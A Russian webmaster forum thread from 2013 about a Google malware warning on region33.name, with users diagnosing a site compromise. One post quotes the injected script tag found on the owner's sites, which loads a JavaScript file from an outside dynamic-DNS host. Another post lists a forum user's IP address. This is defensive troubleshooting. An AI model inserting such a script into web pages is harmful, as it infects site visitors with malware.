Письмо от гугла.

Где искать файлы?

#1 5 мая 2013 в 15:25
пришло письмо от гугла. типо вирус у меня

Уважаемый владелец сайта или вебмастер region33.name, Недавно мы обнаружили, что некоторые из ваших страниц может привести к пользователям быть заражен вредоносными программами. Мы начали показ страница предупреждения для пользователей, которые посещают эти страницы, щелкнув результатов поиска на Google.com. Ниже приведены некоторые примеры Url на вашем сайте, который может привести к пользователям, будут инфицированы (пробел вставляется для предотвращения случайного нажатия в случае, если ваш почтовый клиент авто-ссылки Url):
region33 .name/
region33 .name/r1
region33 .name/go/

но я так и не понял где искать эти страницы.
#2 5 мая 2013 в 15:52
у себя на сайте ищи, адреса же дали.
#3 5 мая 2013 в 15:53
убари рекламу которая может вирусы давать и всякие левые запииси пользователей
#4 5 мая 2013 в 15:53
Похоже на то, что это письмо — фейк.
Во первых, гугл достаточно хорошо умеет писть по русски со всеми спряжениями и падежами.
Во вторых, посмотрел на выдачу этого сайта в гугле — никаких предупреждений об опасности.
В третьих, вот этот пассаж

(пробел вставляется для предотвращения случайного нажатия в случае, если ваш почтовый клиент авто-ссылки Url):

nedoriko
— вообще цирк, они бы не стали такую чушь пороть.)))
#5 5 мая 2013 в 16:19

Похоже на то, что это письмо — фейк.

Нил
Похоже, что не фейк. При попытке перейти на сайт регион33 Chrome выдает предупреждение:
Веб-сайт, на который вы хотите перейти, содержит вредоносное ПО!
Google Chrome заблокировал доступ к region33.name
#6 5 мая 2013 в 16:33
Письмо на английском было. Это автопереводчик. Но ссылки какието несуществующие. К примеру при попытке войти на страницу р1 открывается главная.
Сейчас буду пробовать рекламу по очереди отключать.
#8 5 мая 2013 в 16:57
а сецчас ваще запутался. Проверял свой сайт в онлайне на вирусы. А мне выдоло вот

1. region33.name/go, тип файла: html
• зараженный сайт по версии гугла: region33.name
• зараженный сайт по версии гугла: www.region33.name
• зараженный сайт по версии гугла: nedoriko.ru

Какимто образом они и другой сайт к списку добавили?
#9 5 мая 2013 в 17:04

Eset Smart Security выдает.

Соглашусь с

Константин Г.
Посетитель


Сообщений: 269
#3 — Сегодня в 15:53
Цитировать выделенное Ответить
убари рекламу которая может вирусы давать и всякие левые запииси пользователей

Константин Г.
#10 5 мая 2013 в 17:08

• зараженный сайт по версии гугла: nedoriko.ru

nedoriko

кстати, да. этотсайт тоже блокируется и хроми нод32
#11 5 мая 2013 в 17:11
У тебя на обоих сайтах сайта в самом низу код на который нод32 и указывает

<script src="http://gvxsgmk. dnsdojo. net /rsize.js"> </script>

А
#12 5 мая 2013 в 17:43
Смотрите по FTP измененные файлы, либо индексы либо в темплейте. Возможно дописали в js файлы с расширением на запись.
#13 5 мая 2013 в 18:17
Смотрите в файле index.php
В самом конце этого файла прописывается код.
У меня было такое.
#14 9 мая 2013 в 21:10
интересная штука этот яндексвебмастер.
этот пользователь
himik912 с айпи 31.28.212.162
а вот список страниц с вирусами
Дата последней проверки

region33.name/victorina/vopros166237.html
Поведенческий анализ
06.05.2013
region33.name/victorina/vopros162175.html
Поведенческий анализ
06.05.2013
region33.name/victorina/vopros1446.html
Поведенческий анализ
06.05.2013
region33.name/users/himik912
Поведенческий анализ

ну мы то знаем что вопросы лежат в одном файле. и еслиб викторина была заряженна то все вопросы бы светились.
или я ошибаюсь?
#15 9 мая 2013 в 21:11

Смотрите в файле index.php

Евген
там ничего нету.
Вы не можете отвечать в этой теме.
Войдите или зарегистрируйтесь, чтобы писать на форуме.
Используя этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.